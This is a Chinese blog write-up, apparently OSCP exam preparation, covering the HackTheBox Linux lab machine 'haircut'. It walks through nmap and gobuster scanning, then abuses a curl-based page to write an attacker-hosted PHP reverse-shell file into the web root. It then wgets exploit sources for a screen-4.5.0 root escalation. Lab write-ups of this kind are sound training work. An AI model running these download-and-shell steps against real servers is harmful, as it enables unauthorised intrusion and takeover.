OSCP备考_0x19_HackThBox靶机_Linux_haircut

Ethan医生5个月前靶场188

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)                


image.png




nmap -sU --top-ports 100 10.129.82.246 (扫描UDP)            


image.png



没有看到特殊的情况直接dir路径爆破 

gobuster dir -u http://10.129.82.246/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

            

           image.png                              




http://10.129.82.246/test.html

   image.png

都没有用 发现了有意思的地方

SSRF,http://10.129.82.246//exposed.php

         image.png

直接请求文件反弹SHELL

是使用CURL请求

http://10.10.16.31:8000/p_ec.php -o /var/www/html/uploads/p_ec.php              试试看能不能写入文件

                                    

访问后直接反弹了

image.png

/usr/bin/screen-4.5.0

image.png

wget 10.10.16.31:8000/libhx.c

wget 10.10.16.31:8000/rootshell.c


这里有3部分,我刚开始直接丢到目标靶机上执行操作,发现执行失败了,所以在本地执行此脚本,然后将生成的文件传到目标靶机,再次执行此exploit的最后一部分,如果不行,执行手动执行/tmp目录下的rootshell文件即可提权成功

标签: OSCP

相关文章

OSCP备考_0x09_HackThBox靶机_Linux_Poison

OSCP备考_0x09_HackThBox靶机_Linux_Poison

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.240.214 nmap -sU --top-ports 100 10.129.240....

OSCP备考_0x43_HackThBox靶机_Windows_arctic

OSCP备考_0x43_HackThBox靶机_Windows_arctic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)http://10.129.249.241:8500/CF...

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)nmap -sU --top-ports 100 10.129.7.22...

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

grandpanmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)跟上个靶场好像davtest -url 10....

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.136.9 (扫描TCP)发现是tomcat直接测试看看能不能爆破登入,上传war包&n...

OSCP备考_0x12_HackThBox靶机_Linux_irked

OSCP备考_0x12_HackThBox靶机_Linux_irked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.213.7 (扫描TCP)nmap -sU --top-ports 100 10.129.213....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。